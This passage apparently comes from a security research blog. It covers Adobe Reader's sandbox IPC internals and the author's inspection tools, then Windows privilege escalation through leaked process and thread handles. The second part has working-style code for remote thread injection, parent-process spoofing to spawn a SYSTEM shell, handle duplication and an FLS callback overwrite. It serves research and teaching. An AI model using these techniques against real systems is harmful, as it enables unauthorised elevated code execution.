And in the IPC shared memory section:

1
2
3
0:009> dd 2a10000
02a10000  0000000f 00000088 00000134 00000001
02a10010  00000010 00000014 00000003 00020134

So we have 16 channels, a handle to server_alive, and the start of our ChannelControl array.

The server_alive handle is a mutex used to signal if the server has crashed. It’s used during tag invocation in SharedmemIPCClient::DoCall, which we’ll describe later on. For now, assume that if we WaitForSingleObject on this and it returns WAIT_ABANDONED, the server has crashed.

ChannelControl is a structure that describes a channel, and is again defined as:

1
2
3
4
5
6
7
struct ChannelControl {
  size_t channel_base;
  volatile LONG state;
  HANDLE ping_event;
  HANDLE pong_event;
  uint32 ipc_tag;
};

The channel_base describes the channel’s buffer, ie. where the CrossCallParams structure can be found. This is an offset from the base of the shared memory section.

state is an enum that describes the state of the channel:

1
2
3
4
5
6
7
enum ChannelState {
  kFreeChannel = 1,
  kBusyChannel,
  kAckChannel,
  kReadyChannel,
  kAbandonnedChannel
};

The ping and pong events are, as previously described, used to signal to the opposite endpoint that data is ready for consumption. For example, when the client has written out its CrossCallParams and ready for the server, it signals:

1
2
3
4
  DWORD wait = ::SignalObjectAndWait(channel[num].ping_event,
                                     channel[num].pong_event,
                                     kIPCWaitTimeOut1,
                                     FALSE);

When the server has completed processing the request, the pong_event is signaled and the client reads back the call result.

A channel is fetched via SharedMemIPCClient::LockFreeChannel and is invoked when GetBuffer is called. This simply identifies a channel in the IPCControl array wherein state == kFreeChannel, and sets it to kBusyChannel. With a channel, we can now write out our CrossCallParams structure to the shared memory buffer. Our target buffer begins at channel->channel_base.

Writing out the CrossCallParams has a few nuances. First, the number of actual parameters is NUMBER_PARAMS+1. According to the source:

1
2
3
4
// Note that the actual number of params is NUMBER_PARAMS + 1
// so that the size of each actual param can be computed from the difference
// between one parameter and the next down. The offset of the last param
// points to the end of the buffer and the type and size are undefined.

This can be observed in the CopyParamIn function:

1
2
3
4
param_info_[index + 1].offset_ = Align(param_info_[index].offset_ +
                                            size);
param_info_[index].size_ = size;
param_info_[index].type_ = type;

Note the offset written is the offset for index+1. In addition, this offset is aligned. This is a pretty simple function that byte aligns the delta inside the channel buffer:

1
2
3
4
5
6
7
8
// Increases |value| until there is no need for padding given the 2*pointer
// alignment on the platform. Returns the increased value.
// NOTE: This might not be good enough for some buffer. The OS might want the
// structure inside the buffer to be aligned also.
size_t Align(size_t value) {
  size_t alignment = sizeof(ULONG_PTR) * 2;
    return ((value + alignment - 1) / alignment) * alignment;
    }

Because the Reader process is x86, the alignment is always 8.

The pseudo-code for writing out our CrossCallParams can be distilled into the following:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
write_uint(buffer,     tag);
write_uint(buffer+0x4, is_in_out);

// reserve 52 bytes for CrossCallReturn
write_crosscall_return(buffer+0x8);

write_uint(buffer+0x3c, param_count);

// calculate initial delta 
delta = ((param_count + 1) * 12) + 12 + 52;

// write out the first argument's offset 
write_uint(buffer + (0x4 * (3 * 0 + 0x11)), delta);

for idx in range(param_count):
    
    write_uint(buffer + (0x4 * (3 * idx + 0x10)), type);
    write_uint(buffer + (0x4 * (3 * idx + 0x12)), size);

    // ...write out argument data. This varies based on the type

    // calculate new delta
    delta = Align(delta + size)
    write_uint(buffer + (0x4 * (3 * (idx+1) + 0x11)), delta);

// finally, write the tag out to the ChannelControl struct
write_uint(channel_control->tag, tag);

Once the CrossCallParams structure has been written out, the sandboxed process signals the ping_event and the broker is triggered.

Broker side handling is fairly straightforward. The server registers a ping_event handler during SharedMemIPCServer::Init:

1
2
 thread_provider_->RegisterWait(this, service_context->ping_event,
                                ThreadPingEventReady, service_context);

RegisterWait is just a thread pool wrapper around a call to RegisterWaitForSingleObject.

The ThreadPingEventReady function marks the channel as kAckChannel, fetches a pointer to the provided buffer, and invokes InvokeCallback. Once this returns, it copies the CrossCallReturn structure back to the channel and signals the pong_event mutex.

InvokeCallback parses out the buffer and handles validation of data, at a high level (ensures strings are strings, buffers and sizes match up, etc.). This is probably a good time to document the supported argument types. There are 10 types in total, two of which are placeholder:

1
2
3
4
5
6
7
8
9
10
11
12
ArgType = {
    0: "INVALID_TYPE",
    1: "WCHAR_TYPE", 
    2: "ULONG_TYPE",
    3: "UNISTR_TYPE", # treated same as WCHAR_TYPE
    4: "VOIDPTR_TYPE",
    5: "INPTR_TYPE",
    6: "INOUTPTR_TYPE",
    7: "ASCII_TYPE",
    8: "MEM_TYPE", 
    9: "LAST_TYPE" 
}

These are taken from internal_types, but you’ll notice there are two additional types: ASCII_TYPE and MEM_TYPE, and are unique to Reader. ASCII_TYPE is, as expected, a simple 7bit ASCII string. MEM_TYPE is a memory structure used by the broker to read data out of the sandboxed process, ie. for more complex types that can’t be trivially passed via the API. It’s additionally used for data blobs, such as PNG images, enhanced-format datafiles, and more.

Some of these types should be self-explanatory; WCHAR_TYPE is naturally a wide char, ASCII_TYPE an ascii string, and ULONG_TYPE a ulong. Let’s look at a few of the non-obvious types, however: VOIDPTR_TYPE, INPTR_TYPE, INOUTPTR_TYPE, and MEM_TYPE.

Starting with VOIDPTR_TYPE, this is a standard type in the Chromium sandbox so we can just refer to the source code. SharedMemIPCServer::GetArgs calls GetParameterVoidPtr. Simply, once the value itself is extracted it’s cast to a void ptr:

1
*param = *(reinterpret_cast<void**>(start));

This allows tags to reference objects and data within the broker process itself. An example might be NtOpenProcessToken, whose first parameter is a handle to the target process. This would be retrieved first by a call to OpenProcess, handed back to the child process, and then supplied in any future calls that may need to use the handle as a VOIDPTR_TYPE.

In the Chromium source code, INPTR_TYPE is extracted as a raw value via GetRawParameter and no additional processing is performed. However, in Adobe Reader, it’s actually extracted in the same way INOUTPTR_TYPE is.

INOUTPTR_TYPE is wrapped as a CountedBuffer and may be written to during the IPC call. For example, if CreateProcessW is invoked, the PROCESS_INFORMATION pointer will be of type INOUTPTR_TYPE.

The final type is MEM_TYPE, which is unique to Adobe Reader. We can define the structure as:

1
2
3
4
5
struct MEM_TYPE {
  HANDLE hProcess;
  DWORD lpBaseAddress;
  SIZE_T nSize;
};

As mentioned, this type is primarily used to transfer data buffers to and from the broker process. It seems crazy. Each tag is responsible for performing its own validation of the provided values before they’re used in any ReadProcessMemory/WriteProcessMemory call.

Once the broker has parsed out the passed arguments, it fetches the context dispatcher and identifies our tag handler:

1
2
3
ContextDispatcher = *(int (__thiscall ****)(_DWORD, int *, int *))(Context + 24);// fetch dispatcher function from Server control
target_info = Context + 28;
handler = (**ContextDispatcher)(ContextDispatcher, &ipc_params, &callback_generic);// PolicyBase::OnMessageReady

The handler is fetched from PolicyBase::OnMessageReady, which winds up calling Dispatcher::OnMessageReady. This is a pretty simple function that crawls the registered IPC tag list for the correct handler. We finally hit InvokeCallbackArgs, unique to Reader, which invokes the handler with the proper argument count:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
switch ( ParamCount )
  {
    case 0:
      v7 = callback_generic(_this, CrossCallParamsEx);
      goto LABEL_20;
    case 1:
      v7 = ((int (__thiscall *)(void *, int, _DWORD))callback_generic)(_this, CrossCallParamsEx, *args);
      goto LABEL_20;
    case 2:
      v7 = ((int (__thiscall *)(void *, int, _DWORD, _DWORD))callback_generic)(_this, CrossCallParamsEx, *args, args[1]);
      goto LABEL_20;
    case 3:
      v7 = ((int (__thiscall *)(void *, int, _DWORD, _DWORD, _DWORD))callback_generic)(
             _this,
             CrossCallParamsEx,
             *args,
             args[1],
             args[2]);
      goto LABEL_20;

[...]

In total, Reader supports tag functions with up to 17 arguments. I have no idea why that would be necessary, but it is. Additionally note the first two arguments to each tag handler: context handler (dispatcher) and CrossCallParamsEx. This last structure is actually the broker’s version of a CrossCallParams with more paranoia.

A single function is used to register IPC tags, called from a single initialization function, making it relatively easy for us to scrape them all at runtime. Pulling out all of the IPC tags can be done both statically and dynamically; the former is far easier, the latter is more accurate. I’ve implemented a static generator using IDAPython, available in this project’s repository (ida_find_tags.py), and can be used to pull all supported IPC tags out of Reader along with their parameters. This is not going to be wholly indicative of all possible calls, however. During initialization of the sandbox, many feature checks are performed to probe the availability of certain capabilities. If these fail, the tag is not registered.

Tags are given a handle to CrossCallParamsEx, which gives them access to the CrossCallReturn structure. This is defined here and, repeated from above, defined as:

1
2
3
4
5
6
7
8
9
10
11
12
struct CrossCallReturn {
  uint32 tag_;
  uint32 call_outcome;
  union {
    NTSTATUS nt_status;
    DWORD win32_result;
  };

  HANDLE handle;
  uint32 extended_count;
  MultiType extended[kExtendedReturnCount];
};

This 52 byte structure is embedded in the CrossCallParams transferred by the sandboxed process. Once the tag has returned from execution, the following occurs:

1
2
3
4
5
6
7
8
9
10
11
12
 if (error) {
    if (handler)
      SetCallError(SBOX_ERROR_FAILED_IPC, call_result);
  } else {
    memcpy(call_result, &ipc_info.return_info, sizeof(*call_result));
    SetCallSuccess(call_result);
    if (params->IsInOut()) {
      // Maybe the params got changed by the broker. We need to upadte the
      // memory section.
      memcpy(ipc_buffer, params.get(), output_size);
    }
  }

and the sandboxed process can finally read out its result. Note that this mechanism does not allow for the exchange of more complex types, hence the availability of MEM_TYPE. The final step is signaling the pong_event, completing the call and freeing the channel.

Tags

Now that we understand how the IPC mechanism itself works, let’s examine the implemented tags in the sandbox. Tags are registered during initialization by a function we’ll call InitializeSandboxCallback. This is a large function that handles allocating sandbox tag objects and invoking their respective initalizers. Each initializer uses a function, RegisterTag, to construct and register individual tags. A tag is defined by a SandTag structure:

1
2
3
4
5
typedef struct SandTag {
  DWORD IPCTag;
  ArgType Arguments[17];
  LPVOID Handler;
};

The Arguments array is initialized to INVALID_TYPE and ignored if the tag does not use all 17 slots. Here’s an example of a tag structure:

1
2
3
4
5
.rdata:00DD49A8 IpcTag3         dd 3                    ; IPCTag
.rdata:00DD49A8                                         ; DATA XREF: 000190FA↑r
.rdata:00DD49A8                                         ; 00019140↑o ...
.rdata:00DD49A8                 dd 1, 6 dup(2), 0Ah dup(0); Arguments
.rdata:00DD49A8                 dd offset FilesystemDispatcher__NtCreateFile; Handler

Here we see tag 3 with 7 arguments; the first is WCHAR_TYPE and the remaining 6 are ULONG_TYPE. This lines up with what know to be the NtCreateFile tag handler.

Each tag is part of a group that denotes its behavior. There are 20 groups in total:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
SandboxFilesystemDispatcher
SandboxNamedPipeDispatcher
SandboxProcessThreadDispatcher
SandboxSyncDispatcher
SandboxRegistryDispatcher
SandboxBrokerServerDispatcher
SandboxMutantDispatcher
SandboxSectionDispatcher
SandboxMAPIDispatcher
SandboxClipboardDispatcher
SandboxCryptDispatcher
SandboxKerberosDispatcher
SandboxExecProcessDispatcher
SandboxWininetDispatcher
SandboxSelfhealDispatcher
SandboxPrintDispatcher
SandboxPreviewDispatcher
SandboxDDEDispatcher
SandboxAtomDispatcher
SandboxTaskbarManagerDispatcher

The names were extracted either from the Reader binary itself or through correlation with Chromium. Each dispatcher implements an initialization routine that invokes RegisterDispatchFunction for each tag. The number of registered tags will differ depending on the installation, version, features, etc. of the Reader process. SandboxBrokerServerDispatcher, for example, can have a sway of approximately 25 tags.

Instead of providing a description of each dispatcher in this post, I’ve instead put together a separate page, which can be found here. This page can be used as a tag reference and has some general information about each. Over time I’ll add my notes on the calls. I’ve additionally pushed the scripts used to extract tag information from the Reader binary and generate the table to the sander repository detailed below.

libread

Over the course of this research, I developed a library and set of tools for examining and exercising the Reader sandbox. The library, libread, was developed to programmatically interface with the broker in real time, allowing for quickly exercising components of the broker and dynamically reversing various facilities. In addition, the library was critical during my fuzzing expeditions. All of the fuzzing tools and data will be available in the next post in this series.

libread is fairly flexible and easy to use, but still pretty rudimentary and, of course, built off of my reverse engineering efforts. It won’t be feature complete nor even completely accurate. Pull requests are welcome.

The library implements all of the notable structures and provides a few helper functions for locating the ServerControl from the broker process. As we’ve seen, a ServerControl is a broker’s view of a channel and it is held by the broker alone. This means it’s not somewhere predictable in shared memory and we’ve got to scan the broker’s memory hunting it. From the sandbox side there is also a find_memory_map helper for locating the base address of the shared memory map.

In addition to this library I’m releasing sander. This is a command line tool that consumes libread to provide some useful functionality for inspecting the sandbox:

1
2
3
4
5
6
7
$ sander.exe -h
[-] sander: [action] <pid>
          -m   -  Monitor mode
          -d   -  Dump channels
          -t   -  Trigger test call (tag 62)
          -c   -  Capture IPC traffic and log to disk
          -h   -  Print this menu

The most useful functionality provided here is the -m flag. This allows one to monitor the IPC calls and their arguments in real time:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
$ sander.exe -m 6132
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 266 1 Parameters
      WCHAR_TYPE: _WVWT*&^$
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 34  1 Parameters
      WCHAR_TYPE: C:\Users\bja\desktop\test.pdf
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 247 2 Parameters
      WCHAR_TYPE: C:\Users\bja\desktop\test.pdf
      ULONG_TYPE: 00000000
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 16  6 Parameters
      WCHAR_TYPE: Software\Adobe\Acrobat Reader\DC\SessionManagement
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 00000434
      ULONG_TYPE: 000f003f
      ULONG_TYPE: 00000000
      ULONG_TYPE: 00000000
[6020] ESP: 037dfca4    Buffer 029f0134 Tag 16  6 Parameters
      WCHAR_TYPE: cWindowsCurrent
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 0000043c
      ULONG_TYPE: 000f003f
      ULONG_TYPE: 00000000
      ULONG_TYPE: 00000000
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 16  6 Parameters
      WCHAR_TYPE: cWin0
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 00000434
      ULONG_TYPE: 000f003f
      ULONG_TYPE: 00000000
      ULONG_TYPE: 00000000
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 17  4 Parameters
      WCHAR_TYPE: cTab0
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 00000298
      ULONG_TYPE: 000f003f
[2572] ESP: 0335fd5c    Buffer 029f0134 Tag 17  4 Parameters
      WCHAR_TYPE: cPathInfo
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 000003cc
      ULONG_TYPE: 000f003f

We’re also able to dump all IPC calls in the brokers’ channels (-d), which can help debug threading issues when fuzzing, and trigger a test IPC call (-t). This latter function demonstrates how to send your own IPC calls via libread as well as allows you to test out additional tooling.

The last available feature is the -c flag, which captures all IPC traffic and logs the channel buffer to a file on disk. I used this primarily to seed part of my corpus during fuzzing efforts, as well as aid during some reversing efforts. It’s extremely useful for replaying requests and gathering a baseline corpus of real traffic. We’ll discuss this further in forthcoming posts.

That about concludes this initial post. Next up I’ll discuss the various fuzzing strategies used on this unique interface, the frustrating amount of failure, and the bugs shooken out.

Resources

Exploiting Leaked Process and Thread Handles

22 August 2019 at 21:10

Over the years I’ve seen and exploited the occasional leaked handle bug. These can be particularly fun to toy with, as the handles aren’t always granted PROCESS_ALL_ACCESS or THREAD_ALL_ACCESS, requiring a bit more ingenuity. This post will address the various access rights assignable to handles and what we can do to exploit them to gain elevated code execution. I’ve chosen to focus specifically on process and thread handles as this seems to be the most common, but surely other objects can be exploited in similar manner.

As background, while this bug can occur under various circumstances, I’ve most commonly seen it manifest when some privileged process opens a handle with bInheritHandle set to true. Once this happens, any child process of this privileged process inherits the handle and all access it grants. As example, assume a SYSTEM level process does this:

1
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());

Since it’s allowing the opened handle to be inherited, any child process will gain access to it. If they execute userland code impersonating the desktop user, as a service might often do, those userland processes will have access to that handle.

Existing bugs

There are several public bugs we can point to over the years as example and inspiration. As per usual James Forshaw has a fun one from 2016[0] in which he’s able to leak a privileged thread handle out of the secondary logon service with THREAD_ALL_ACCESS. This is the most “open” of permissions, but he exploited it in a novel way that I was unaware of, at the time.

Another one from Ivan Fratric exploited[1] a leaked process handle with PROCESS_DUP_HANDLE, which even Microsoft knew was bad. In his Bypassing Mitigations by Attacking JIT Server in Microsoft Edge whitepaper, he identifies the JIT server process mapping memory into the content process. To do this, the JIT process needs a handle to it. The content process calls DuplicateHandle on itself with the PROCESS_DUP_HANDLE, which can be exploited to obtain a full access handle.

A more recent example is a Dell LPE [2] in which a THREAD_ALL_ACCESS handle was obtained from a privileged process. They were able to exploit this via a dropped DLL and an APC.

Setup

In this post, I wanted to examine all possible access rights to determine which were exploitable on there own and which were not. Of those that were not, I tried to determine what concoction of privileges were necessary to make it so. I’ve tried to stay “realistic” here in my experience, but you never know what you’ll find in the wild, and this post reflects that.

For testing, I created a simple client and server: a privileged server that leaks a handle, and a client capable of consuming it. Here’s the server:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include "pch.h"
#include <iostream>
#include <Windows.h>

int main(int argc, char **argv)
{
    if (argc <= 1) {
        printf("[-] Please give me a target PID\n");
        return -1;
    }

    HANDLE hUserToken, hUserProcess;
    HANDLE hProcess, hThread;
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    hUserProcess = OpenProcess(PROCESS_QUERY_INFORMATION, false, atoi(argv[1]));
    if (!OpenProcessToken(hUserProcess, TOKEN_ALL_ACCESS, &hUserToken)) {
        printf("[-] Failed to open user process: %d\n", GetLastError());
        CloseHandle(hUserProcess);
        return -1;
    }

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
    printf("[+] Process: %x\n", hProcess);

    CreateProcessAsUserA(hUserToken, 
        "VulnServiceClient.exe", 
        NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
    SuspendThread(hThread);
    return 0;
}

In the above, I’m grabbing a handle to the token we want to impersonate, opening an inheritable handle to the current process (which we’re running as SYSTEM), then spawning a child process. This child process is simply my client application, which will go about attempting to exploit the handle.

The client is, of course, a little more involved. The only component that needs a little discussion up front is fetching the leaked handle. This can be done via NtQuerySystemInformation and does not require any special privileges:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
void ProcessHandles()
{
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    _NtQuerySystemInformation NtQuerySystemInformation =
        (_NtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
    _NtDuplicateObject NtDuplicateObject =
        (_NtDuplicateObject)GetProcAddress(hNtdll, "NtDuplicateObject");
    _NtQueryObject NtQueryObject =
        (_NtQueryObject)GetProcAddress(hNtdll, "NtQueryObject");
    _RtlEqualUnicodeString RtlEqualUnicodeString =
        (_RtlEqualUnicodeString)GetProcAddress(hNtdll, "RtlEqualUnicodeString");
    _RtlInitUnicodeString RtlInitUnicodeString = 
        (_RtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");

    ULONG handleInfoSize = 0x10000;
    NTSTATUS status;
    PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
    DWORD dwPid = GetCurrentProcessId();


    printf("[+] Looking for process handles...\n");

    while ((status = NtQuerySystemInformation(
        SystemHandleInformation,
        phHandleInfo,
        handleInfoSize,
        NULL
    )) == STATUS_INFO_LENGTH_MISMATCH)
        phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(phHandleInfo, handleInfoSize *= 2);

    if (status != STATUS_SUCCESS)
    {
        printf("NtQuerySystemInformation failed!\n");
        return;
    }

    printf("[+] Fetched %d handles\n", phHandleInfo->HandleCount);

    // iterate handles until we find the privileged process
    for (int i = 0; i < phHandleInfo->HandleCount; ++i)
    {
        SYSTEM_HANDLE handle = phHandleInfo->Handles[i];
        POBJECT_TYPE_INFORMATION objectTypeInfo;
        PVOID objectNameInfo;
        UNICODE_STRING objectName;
        ULONG returnLength;

        // Check if this handle belongs to the PID the user specified
        if (handle.ProcessId != dwPid)
            continue;

        objectTypeInfo = (POBJECT_TYPE_INFORMATION)malloc(0x1000);
        if (NtQueryObject(
            (HANDLE)handle.Handle,
            ObjectTypeInformation,
            objectTypeInfo,
            0x1000,
            NULL
        ) != STATUS_SUCCESS)
            continue;

        if (handle.GrantedAccess == 0x0012019f)
        {
            free(objectTypeInfo);
            continue;
        }

        objectNameInfo = malloc(0x1000);
        if (NtQueryObject(
            (HANDLE)handle.Handle,
            ObjectNameInformation,
            objectNameInfo,
            0x1000,
            &returnLength
        ) != STATUS_SUCCESS)
        {
            objectNameInfo = realloc(objectNameInfo, returnLength);
            if (NtQueryObject(
                (HANDLE)handle.Handle,
                ObjectNameInformation,
                objectNameInfo,
                returnLength,
                NULL
            ) != STATUS_SUCCESS)
            {
                free(objectTypeInfo);
                free(objectNameInfo);
                continue;
            }
        }

        // check if we've got a process object; there should only be one, but should we 
        // have multiple, this is where we'd perform the checks
        objectName = *(PUNICODE_STRING)objectNameInfo;
        UNICODE_STRING pProcess, pThread;

        RtlInitUnicodeString(&pThread, L"Thread");
        RtlInitUnicodeString(&pProcess, L"Process");
        if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pProcess, TRUE) && TARGET == 0) {
            printf("[+] Found process handle (%x)\n", handle.Handle);
            HANDLE hProcess = (HANDLE)handle.Handle;
        }
        else if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pThread, TRUE) && TARGET == 1) {
            printf("[+] Found thread handle (%x)\n", handle.Handle);
            HANDLE hThread = (HANDLE)handle.Handle;
        else
            continue;
        
        free(objectTypeInfo);
        free(objectNameInfo);
    }
} 

We’re essentially just fetching all system handles, filtering down to ones belonging to our process, then hunting for a thread or a process. In a more active client process with many threads or process handles we’d need to filter down further, but this is sufficient for testing.

The remainder of this post will be broken down into process and thread security access rights.

Process

There are approximately 14 process-specific rights[3]. We’re going to ignore the standard object access rights for now (DELETE, READ_CONTROL, etc.) as they apply more to the handle itself than what it allows one to do.

Right off the bat, we’re going to dismiss the following:

1
2
3
4
5
6
7
8
PROCESS_QUERY_INFORMATION
PROCESS_QUERY_LIMITED_INFORMATION
PROCESS_SUSPEND_RESUME
PROCESS_TERMINATE
PROCESS_SET_QUOTA
PROCESS_VM_OPERATION
PROCESS_VM_READ
SYNCHRONIZE

To be clear I’m only suggesting that the above access rights cannot be exploited on their own; they are, of course, very useful when roped in with others. There may be weird edge cases in which one of these might be useful (PROCESS_TERMINATE, for example), but barring any magic, I don’t see how.

That leaves the following:

1
2
3
4
5
6
PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_SET_INFORMATION
PROCESS_VM_WRITE

We’ll run through each of these individually.

PROCESS_ALL_ACCESS

The most obvious of them all, this one grants us access to it all. We can simply allocate memory and create a thread to obtain code execution:

1
2
3
4
char payload[] = "\xcc\xcc";
LPVOID lpBuf = VirtualAllocEx(hProcess, NULL, 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, lpBuf, payload, 2, NULL);
CreateRemoteThread(hProcess, NULL, 0, lpBuf, 0, 0, NULL);

Nothing to it.

PROCESS_CREATE_PROCESS

This right is “required to create a process”, which is to say that we can spawn child processes. To do this remotely, we just need to spawn a process and set its parent to the privileged process we’ve got a handle to. This will create the new process and inherit its parent token which will hopefully be a SYSTEM token.

Here’s how we do that:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
STARTUPINFOEXA sinfo = { sizeof(sinfo) };
PROCESS_INFORMATION pinfo;
LPPROC_THREAD_ATTRIBUTE_LIST ptList = NULL;
SIZE_T bytes;

sinfo.StartupInfo.cb = sizeof(STARTUPINFOEXA);
InitializeProcThreadAttributeList(NULL, 1, 0, &bytes);
ptList = (LPPROC_THREAD_ATTRIBUTE_LIST)malloc(bytes);
InitializeProcThreadAttributeList(ptList, 1, 0, &bytes);

UpdateProcThreadAttribute(ptList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hPrivProc, sizeof(HANDLE), NULL, NULL);
sinfo.lpAttributeList = ptList;

CreateProcessA("cmd.exe", (LPSTR)"cmd.exe /c calc.exe", 
        NULL, NULL, TRUE, 
        EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, 
        &sinfo.StartupInfo, &pinfo);

We should now have calc running with the privileged token. Obviously we’d want to replace that with something more useful!

PROCESS_CREATE_THREAD

Here we’ve got the ability to use CreateRemoteThread, but can’t control any memory in the target process. There are of course ways we can influence memory without direct write access, such as WNF, but we’d still have no way of resolving those addresses. As it turns out, however, we don’t need the control. CreateRemoteThread can be pointed at a function with a single argument, which gives us quite a bit of control. LoadLibraryA and WinExec are both great candidates for executing child processes or loading arbitrary code.

As example, there’s an ANSI cmd.exe located in msvcrt.dll at offset 0x503b8. We can pass this as an argument to CreateRemoteThread and trigger a WinExec call to pop a shell:

1
2
3
4
5
DWORD dwCmd = (GetModuleBaseAddress(GetCurrentProcessId(), L"msvcrt.dll") + 0x503b8);
HANDLE hThread = CreateRemoteThread(hPrivProc, NULL, 0,
                        (LPTHREAD_START_ROUTINE)WinExec, 
                        (LPVOID)dwCmd, 
                        0, NULL);

We can do something similar for LoadLibraryA. This of course is predicated on the system path containing a writable directory for our user.

PROCESS_DUP_HANDLE

Microsoft’s own documentation on process security and access rights points to this specifically as a sensitive right. Using it, we can simply duplicate our process handle with PROCESS_ALL_ACCESS, allowing us full RW to its address space. As per Ivan Fratric’s JIT bug, it’s as simple as this:

1
2
HANDLE hDup = INVALID_HANDLE_VALUE;
DuplicateHandle(hPrivProc, GetCurrentProcess(), GetCurrentProcess(), &hDup, PROCESS_ALL_ACCESS, 0, 0)

Now we can simply follow the WriteProcessMemory/CreateRemoteThread strategy for executing arbitrary code.

PROCESS_SET_INFORMATION

Granting this permission allows one to execute SetInformationProcess in addition to several fields in NtSetInformationProcess. The latter is far more powerful, but many of the PROCESSINFOCLASS fields available are either read only or require additional privileges to actually set (SeDebugPrivilege for ProcessExceptionPort and ProcessInstrumentationCallback(win7) for example). Process Hacker[15] maintains an up to date definition of this class and its members.

Of the available flags, none were particularly interesting on their own. I needed to add PROCESS_VM_* privileges in order to make any usable and at that point we defeat the purpose.

PROCESS_VM_*

This covers the three flavors of VM access: WRITE/READ/OPERATION. The first two should be self-explanatory and the third allows one to operate on the virtual address space itself, such as changing page protections (VirtualProtectEx) or allocating memory (VirtualAllocEx). I won’t address each permutation of these three, but I think it’s reasonable to assume that PROCESS_VM_WRITE is a necessary requirement. While PROCESS_VM_OPERATION allows us to crash the remote process which could open up other flaws, it’s not a generic nor elegant approach. Ditto with PROCESS_VM_READ.

PROCESS_VM_WRITE proved to be a challenge on its own, and I was unable to come up with a generic solution. At first blush, the entire set of Shatter-like injection strategies documented by Hexacorn[12] seem like they’d be perfect. They simply require the remote process to use windows, clipboard registrations, etc. None of these are guaranteed, but chances are one is bound to exist. Unfortunately for us, many of them restrict access across sessions or scaling integrity levels. We can write into the remote process, but we need some way to gain control over execution flow.

In addition to being unable to modify page permissions, we cannot read nor map/allocate memory. There are plenty of ways we can leak memory from the remote process without directly interfacing with it, however.

Using NtQuerySystemInformation, for example, we can enumerate all threads inside a remote process regardless of its IL. This grants us a list of SYSTEM_EXTENDED_THREAD_INFORMATION objects which contain, among other things, the address of the TEB. NtQueryInformationProcess allows us to fetch the remote process PEB address. This latter API requires the PROCESS_QUERY_INFORMATION right, however, which ended up throwing a major wrench in my plan. Because of this I’m appending PROCESS_QUERY_INFORMATION onto PROCESS_VM_WRITE which gives us the necessary components to pull this off. If someone knows of a way to leak the address of a remote process PEB without it, I’d love to hear.

The approach I took was a bit loopy, but it ended up working reliably and generically. If you’ve read my previous post on fiber local storage (FLS)[13], this is the research I was referring to. If you haven’t, I recommend giving it a brief read, but I’ll regurgitate a bit of it here.

Briefly, we can abuse fibers and FLS to overwrite callbacks which are executed “…on fiber deletion, thread exit, and when an FLS index is freed”. The primary thread of a process will always setup a fiber, thus there will always be a callback for us to overwrite (msvcrt!_freefls). Callbacks are stored in the PEB (FlsCallback) and the fiber local storage in the TEB (FlsData). By smashing the FlsCallback we can obtain control over execution flow when one of the fiber actions are taken.

With only write access to the process, however, this becomes a bit convoluted. We cannot allocate memory and so we need some known location to put the payload. In addition, the FlsCallback and FlsData variables in PEB/TEB are pointers and we’re unable to read these.

Stashing the payload turned out to be pretty simple. Since we’ve established we can leak PEB/TEB addresses we already have two powerful primitives. After looking over both structures, I found that thread local storage (TLS) happened to provide us with enough room to store ROP gadgets and a thin payload. TLS is embedded within the structure itself, so we can simply offset into the TEB address (which we have). If you’re unfamiliar with TLS, Skywing’s write-ups are fantastic and have aged well[14].

Gaining control over the callback was a little trickier. A pointer to a _FLS_CALLBACK_INFO structure is stored in the PEB (FlsCallback) and is an opaque structure. Since we can’t actually read this pointer, we have no simple way of overwriting the pointer. Or do we?

What I ended up doing is overwriting the FlsCallback pointer itself in the PEB, essentially creating my own fake _FLS_CALLBACK_INFO structure in TLS. It’s a pretty simple structure and really only has one value of importance: the callback pointer.

